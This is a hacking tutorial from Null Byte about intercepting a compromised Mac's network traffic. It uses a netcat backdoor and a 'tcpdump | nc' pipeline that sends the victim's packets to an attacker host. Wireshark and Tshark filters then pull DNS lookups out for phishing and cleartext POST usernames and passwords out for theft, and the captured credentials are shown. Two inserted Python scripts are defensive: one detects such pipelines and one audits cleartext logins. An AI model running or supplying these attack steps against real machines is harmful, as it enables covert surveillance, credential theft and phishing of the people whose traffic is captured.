
How To Sniff Passwords On A Mac In Real Time, Part 2 (Packet Analysis) « Null Byte :: WonderHowTo



Most users do not realize how much valuable data is in their network traffic. With a few simple tools, an attacker can quickly pick cookies, passwords, and DNS requests out of a macOS device's traffic while forwarding the victim's network traffic to the attacker's system. Here we will discuss two methods for parsing the packets as they flow from a Mac.

The first method requires Wireshark, which has been covered on Null Byte before. However, using Wireshark to parse packets from a remote device in real time may be a new concept for some readers.

Method two requires Tshark, Wireshark's command-line network protocol analyzer. Tshark is great because, unlike Wireshark, which displays everything and leaves us to search through thousands of packets, it prints only the information we ask for. Readers who prefer command-line tools over graphical applications will appreciate Tshark and its simplicity.

Option 1: Wireshark

I will be brief about installing and using Wireshark, as it has been covered on Null Byte several times before. If you are completely new to Wireshark, it would be a good idea to review all of our guides on it if you want to become proficient with the tool.

Step 1: Install Wireshark

By default, Wireshark is included in most versions of Kali Linux. Some versions do not contain it, so I'll cover the installation quickly in case you don't see it in your Kali version. First, run the following command to make sure the latest version tested and curated by the Kali developers is available, and download it.

  apt-get update && apt-get install wireshark

Hit:1 http://archive-7.kali.org/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
  wireshark
1 upgraded, 0 newly installed, 0 to remove and 963 not upgraded.
Need to get 57.2 kB of archives.
After this operation, 3,072 B of additional disk space will be used.
Get:1 http://archive-7.kali.org/kali kali-rolling/main amd64 wireshark amd64 2.6.1-1 [57.2 kB]
Fetched 57.2 kB in 7s (8,296 B/s)
Reading changelogs... Done
(Reading database ... 321253 files and directories currently installed.)
Preparing to unpack .../wireshark_2.6.1-1_amd64.deb ...
Unpacking wireshark (2.6.1-1) over (2.4.5-1) ...
Setting up wireshark (2.6.1-1) ...

When that's done, Wireshark can be found in the "Sniffing & Spoofing" category in Kali's "Applications" menu.

Step 2: View the data in real time

Instead of saving the packets to a PCAP file (as described in my previous article), we can pipe the data coming out of the Netcat tunnel straight into Wireshark and view it in real time. This is accomplished with a named pipe, created with the mkfifo command, which hands the raw packets directly to Wireshark.

In Kali (attacker's system), use the following command to create a named pipe.

  mkfifo /tmp/listen

Then start a Netcat listener and redirect (>) its output into the pipe called "listen" in the /tmp/ directory. The name of the pipe ("listen") is completely arbitrary and can be anything you like. Netcat listens (-l) on port (-p) 9999 for incoming connections from the macOS device.

  nc -l -p 9999 > /tmp/listen

Now open Wireshark with the -k argument to begin capturing packets immediately. The -i argument, which normally names a capture interface but also accepts a named pipe, should point at the pipe we just created.

  wireshark -k -i /tmp/listen

Wireshark opens, but does not show any packets yet. The setup on the attacker's Kali machine is complete at this time.

Now we have to run tcpdump on the macOS device to instruct it to send us the victim's packets. From the Netcat backdoor, first use the ifconfig command to get the name of the target's wireless interface.

  /sbin/ifconfig -a

lo0: flags=8049 mtu 16384
	options=1203
	inet 127.0.0.1 netmask 0xff000000
	inet6 ::1 prefixlen 128
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
	nd6 options=201
gif0: flags=8010 mtu 1280
stf0: flags=0<> mtu 1280
EHC29: flags=0<> mtu 0
EHC26: flags=0<> mtu 0
XHC20: flags=0<> mtu 0
en0: flags=8863 mtu 1500
	ether e0:b9:ba:c8:bc:c8
	inet 192.168.0.133 netmask 0xffffff00 broadcast 192.168.0.255
	nd6 options=201
	media: autoselect
	status: active
en1: flags=8963 mtu 1500
	options=60
	media: autoselect
	status: inactive
bash-3.2#

The interface with the "inet" address 192.168.0.133 is the wireless interface of my MacBook. In my case the interface is named "en0", but this may vary depending on the macOS device and version.

Use the interface (-i) argument in the following tcpdump command to send the traffic to the attacker's system. Here tcpdump writes (-w) the captured data to standard output (-), which is piped into the Netcat tunnel. The address 1.2.3.4 should be changed to the IP address of the attacker hosting the Netcat listener. This can be a local IP address or a remote VPS IP address.

  /usr/sbin/tcpdump -i <interface> -w - | nc 1.2.3.4 9999

As long as both terminals stay open, tcpdump sends real-time network traffic directly to the attacker's system and into Wireshark.
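Seen from the Mac being monitored, the pipeline described above leaves a recognizable footprint in the process table: a capture tool told to write raw packets to standard output, sitting next to a netcat-style process under the same parent shell. The Python script below is an added example (not code from the original article or from Null Byte) that looks for exactly that pattern in the output of "ps -axo pid,ppid,command". The process listing embedded in it is constructed sample data, not a real host, and the tool-name lists are assumptions about what such a pipeline usually consists of.

```python
"""Spot a packet-capture-to-network pipeline in a process listing.

Added example, not code from the original article. Parses the text printed by
`ps -axo pid,ppid,command` and flags capture tools (tcpdump, tshark, dumpcap)
that write packets to stdout ("-w -") beside a netcat-style sibling process,
which is the shape of the tcpdump | nc pipeline shown above.
"""
import subprocess
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid argv")

# Constructed sample of `ps -axo pid,ppid,command` output (not a real machine).
SAMPLE_PS = """\
  PID  PPID COMMAND
  412     1 /usr/libexec/syslogd
 2231  2200 bash
 2240  2231 /usr/sbin/tcpdump -i en0 -w -
 2241  2231 nc 1.2.3.4 9999
 2250  2200 /usr/bin/ssh admin@host
"""

# Assumed tool names; extend for your environment.
CAPTURE_TOOLS = {"tcpdump", "tshark", "dumpcap"}
RELAY_TOOLS = {"nc", "netcat", "ncat", "socat"}


def parse_ps(text):
    """Turn ps output into Proc records; the first line is the column header."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, ppid, cmd = parts
        procs.append(Proc(int(pid), int(ppid), cmd.split()))
    return procs


def basename(path):
    return path.rsplit("/", 1)[-1]


def writes_to_stdout(argv):
    """True when a capture tool is told to write packets to stdout (-w -)."""
    return any(a == "-w" and argv[i + 1:i + 2] == ["-"]
               for i, a in enumerate(argv))


def find_capture_pipelines(procs):
    """Return (capture_proc, relay_proc_or_None) pairs worth a closer look.

    A capture tool writing to stdout is notable on its own; a netcat-style
    sibling under the same parent makes a forwarding pipeline likely.
    """
    by_parent = {}
    for p in procs:
        by_parent.setdefault(p.ppid, []).append(p)
    hits = []
    for p in procs:
        if basename(p.argv[0]) in CAPTURE_TOOLS and writes_to_stdout(p.argv):
            relay = next((s for s in by_parent.get(p.ppid, [])
                          if basename(s.argv[0]) in RELAY_TOOLS), None)
            hits.append((p, relay))
    return hits


def live_ps():
    """Read the real process table (these ps flags work on macOS)."""
    return subprocess.run(["ps", "-axo", "pid,ppid,command"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for cap, relay in find_capture_pipelines(parse_ps(SAMPLE_PS)):
        print(f"capture pid {cap.pid}: {' '.join(cap.argv)}")
        if relay:
            print(f"  piped to pid {relay.pid}: {' '.join(relay.argv)}")
```

Run as-is it checks the constructed sample; swap SAMPLE_PS for live_ps() to inspect the current machine. A capture tool with "-w -" is not malicious by itself (a local capture piped into an analyzer looks the same), which is why the relay sibling is what turns a note into an alert.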

Step 3: Sniff DNS Traffic to Find Phishing Candidates

Unfortunately (for hackers), many sites today use encryption that prevents a sniffer from learning credentials. Tracking domain-name traffic for sites that send and receive encrypted data still has its benefits, though. We can learn a lot about a target by analyzing their DNS traffic and preferred sites for future phishing attacks.

To filter for DNS traffic, enter the string "dns" in Wireshark's display filter bar.

Step 4: Tag POST Data for Passwords

The most popular websites use encryption, but there are still many protocols and millions of websites that do not encrypt sensitive data. POST data is likely to contain the most compromising and insightful information. Here we may find usernames, passwords, home addresses, e-mail addresses, social security information, chat logs, and more.

To filter for POST data, enter the string http.request.method == "POST" in Wireshark's display filter bar.

Option 2: Tshark

Alternatively, we can use Tshark with the "/tmp/listen" named pipe created earlier. Tshark is not necessarily better than Wireshark; both tools have advantages and disadvantages. Tshark only shows what we ask of it, which means we can miss some tiny (but valuable) data because we restricted the display filter too narrowly. Conversely, Wireshark can display too much information and cause us to miss a useful bit of data. Once again, there are pros and cons to both tools.

Step 1: Install Tshark

Tshark is available in the Kali repositories and can be installed with the following command.

  apt-get update && apt-get install tshark

Hit:1 http://archive-7.kali.org/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
Use 'apt autoremove' to remove them.
The following NEW packages will be installed:
  tshark
0 upgraded, 1 newly installed, 0 to remove and 945 not upgraded.
Need to get 186 kB of archives.
After this operation, 404 kB of additional disk space will be used.
Get:1 http://archive-7.kali.org/kali kali-rolling/main amd64 tshark amd64 2.6.1-1 [186 kB]
Fetched 186 kB in 7s (27.0 kB/s)
Selecting previously unselected package tshark.
(Reading database ... 321331 files and directories currently installed.)
Preparing to unpack .../tshark_2.6.1-1_amd64.deb ...
Unpacking tshark (2.6.1-1) ...
Processing triggers for man-db (2.8.2-1) ...
Setting up tshark (2.6.1-1) ...

Step 2: Sniff DNS queries with Tshark

Use the following command to dump DNS traffic. The capture filter (-f "src port 53") keeps only packets coming from DNS servers, and -T fields with -e dns.qry.name prints nothing but the queried name. The field names given to -e are the same ones used in Wireshark's display filters.

  tshark -i /tmp/listen -f "src port 53" -n -T fields -e dns.qry.name

Capturing on '/tmp/listen'
twitch.tv
twitch.tv
www.twitch.tv
www.twitch.tv
linkedin.com
linkedin.com
www.linkedin.com
www.linkedin.com
static.twitchcdn.net
static.twitchcdn.net
ocsp.digicert.com
yahoo.co.jp
yahoo.co.jp
yahoo.co.jp
static.licdn.com
www.yahoo.co.jp
static.licdn.com
www.yahoo.co.jp
www.yahoo.co.jp
ocsp.cybertrust.ne.jp
ocsp.cybertrust.ne.jp
office.com
www.office.com
s.yimg.jp
www.office.com
www.office.com
www.office.com
s.yimg.jp
s.yimg.jp
weuofficehome.msocdn.com
statics-uhf-neu.akamaized.net
c.microsoft.com
c.microsoft.com
lpt.c.yimg.jp
iwiz-blog-cms.c.yimg.jp 

Using this data, we can easily identify a target's favorite sites and begin preparing phishing sites for social engineering attacks.

Step 3: Sniff Passwords with Tshark

Filter POST requests (http.request.method == POST) that contain the string "pass" to find passwords sent in clear text. Also use several field (-e) arguments to print the full URL (http.request.full_uri), the POST data keys (urlencoded-form.key) and their values (urlencoded-form.value). The keys help us understand how the values are formatted. For example, the keys could read "username, password" while the corresponding values read "tokyoneon, Pa$$word321". Below are two examples.

  tshark -i /tmp/listen -Y 'http.request.method == POST and tcp contains "pass"' -T fields -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value

Capturing on '/tmp/listen'

http://www.website.org/servlet/login	username,password,rememberme,srv	hacker@nullbyte.com,123Password321,1,12

http://login.website2.com/?r=75aa94fce9687c7aa43e91d1572a1dbd	login,password,login	fakeemail@gmail.com,y0u11 n3v3r gU3$$ MY Pa$$w0rd!!,Login

Some POST data contains several parameters and is more difficult to interpret. Here we see an authentication token followed by the user's email address and password.

  tshark -i /tmp/listen -Y 'http.request.method == POST and tcp contains "pass"' -T fields -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value

Capturing on '/tmp/listen'

http://login.website3.com/users/sign_in	utf8,authenticity_token,user[email],user[password],commit,user[remember_me]	✓,ji5H6Z6WO+bwup3ey/3kI2P7++5t6ptj87y9uTAQ7rw0o4QNP+EAKUVIAW5xCScd60sqPyz8bMj+AoumPIUzQ==,hacker@nullbyte.com,123Password321,,0
http://login.website3.com/users/sign_in	utf8,authenticity_token,user[email],user[password],commit,user[remember_me]	✓,HCsJXi+xDjkOhIXxl+g1JVg4EzKTBBBjIl3YifZ2+bWmpsq6jsY19rt2GUEtHPYb0IjC49IS58gv4+6uXpQDxA==,hacker@nullbyte.com,123passw0rd321,,0
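Whether the POST filter is typed into Wireshark (Option 1, Step 4) or handed to Tshark with -Y (this step), the work that remains is the same: line up each urlencoded-form key with its value and notice that the request travelled over plain http. The Python helper below is an added example, not code from the original article, that does that pairing on the tab-separated output of tshark -T fields. It is written as an audit: it lists the hosts to which credential-looking parameters are submitted without TLS, which is the list a site owner or network administrator needs in order to fix them. The three input lines are constructed to have the same shape as the output shown above (placeholder token, addresses and passwords), not a real capture, and the credential-hint words are an assumption.

```python
"""Rebuild form key/value pairs from tshark -T fields output and audit them.

Added example, not code from the original article. tshark -T fields prints
one line per matching packet with the requested fields separated by tabs;
when a field occurs several times in one packet (every form key and value
does) the occurrences are joined with a comma unless -E aggregator=<char>
says otherwise. The sample lines below are constructed; the token, e-mail
addresses and passwords are placeholders.
"""
from urllib.parse import urlsplit

# Constructed sample of:
#   tshark -Y 'http.request.method == POST and tcp contains "pass"' -T fields \
#       -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value
SAMPLE_FIELDS = (
    "http://www.website.org/servlet/login\t"
    "username,password,rememberme,srv\t"
    "user@example.com,Pa$$word321,1,12\n"
    "http://login.website3.com/users/sign_in\t"
    "utf8,authenticity_token,user[email],user[password],commit,user[remember_me]\t"
    "\u2713,TOKEN_PLACEHOLDER==,user@example.com,Pa$$word321,,0\n"
    "https://secure.example.net/api/session\t"
    "email,password\t"
    "user@example.com,Pa$$word321\n"
)

# Assumed substrings that mark a parameter as carrying a secret (matched lower-case).
CREDENTIAL_HINTS = ("pass", "pwd", "secret", "token")


def parse_fields_line(line, aggregator=","):
    """Split one tshark line into (uri, [(key, value), ...]).

    Keys and values are split on the same aggregator tshark used, so a value
    that itself contains a comma would shift every later pair. Capture with
    -E aggregator='|' and pass aggregator="|" here when that can happen.
    """
    uri, keys, values = line.rstrip("\n").split("\t")
    key_list = keys.split(aggregator) if keys else []
    value_list = values.split(aggregator) if values else []
    if len(key_list) != len(value_list):
        raise ValueError(f"{uri}: {len(key_list)} keys but {len(value_list)} values")
    return uri, list(zip(key_list, value_list))


def audit_request(line):
    """Describe one POST: host, whether it was cleartext, and credential-like keys."""
    uri, pairs = parse_fields_line(line)
    parts = urlsplit(uri)
    credential_keys = [k for k, _ in pairs
                       if any(hint in k.lower() for hint in CREDENTIAL_HINTS)]
    return {
        "host": parts.hostname,
        "cleartext": parts.scheme == "http",
        "credential_keys": credential_keys,
        "pairs": pairs,
    }


def cleartext_credential_hosts(fields_output):
    """Hosts that received a credential-looking parameter over plain http."""
    hosts = set()
    for line in fields_output.splitlines():
        if not line.strip():
            continue
        report = audit_request(line)
        if report["cleartext"] and report["credential_keys"]:
            hosts.add(report["host"])
    return sorted(hosts)


if __name__ == "__main__":
    for line in SAMPLE_FIELDS.splitlines():
        report = audit_request(line)
        scheme = "CLEARTEXT" if report["cleartext"] else "tls"
        print(f"{report['host']:28} {scheme:9} {report['credential_keys']}")
    print("hosts needing attention:", cleartext_credential_hosts(SAMPLE_FIELDS))
```

Feed it a saved tshark fields file instead of SAMPLE_FIELDS to audit a real capture. The empty "commit" value in the second sample line is the case that trips naive parsers: it survives only because keys and values are split on the same aggregator and their counts are checked before zipping.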

Tshark and Wireshark are both excellent tools for sniffing packets. Readers who prefer to work in a terminal will also prefer Tshark over Wireshark. For a comprehensive look at display filters, read Wireshark's official documentation.


Cover Picture of Negative Space / Pexels; Screenshots of tokyoneon / Null Byte
